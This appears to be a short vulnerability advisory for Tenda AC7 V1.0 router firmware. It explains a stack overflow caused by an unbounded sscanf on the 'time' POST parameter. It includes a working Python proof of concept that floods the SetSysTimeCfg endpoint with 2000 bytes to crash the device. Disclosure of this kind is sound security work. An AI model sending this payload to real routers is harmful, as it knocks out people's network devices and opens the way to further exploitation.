AC7V1.0 V15.03.06.44
The Tenda AC7V1.0 V15.03.06.44 firmware has a stack overflow vulnerability in the fromSetSysTime function. The tmpstr variable receives the time parameter from a POST request and is assigned to year~sec by sscanf. However, since the user can control the input of time, the statement sscanf(tmpstr, "%[^-]-%[^-]-%[^ ] %[^:]:%[^:]:%s", year, month, day, hour, min, sec); can cause a buffer overflow. The user-provided time can exceed the capacity of the year~sec array, triggering this security vulnerability.
import requests
from pwn import*
ip = "192.168.84.101"
url = "http://" + ip + "/goform/SetSysTimeCfg"
payload = b"a"*2000
data = {
'timeType':'sync',
'time':payload,
}
response = requests.post(url, data=data)
print(response.text)
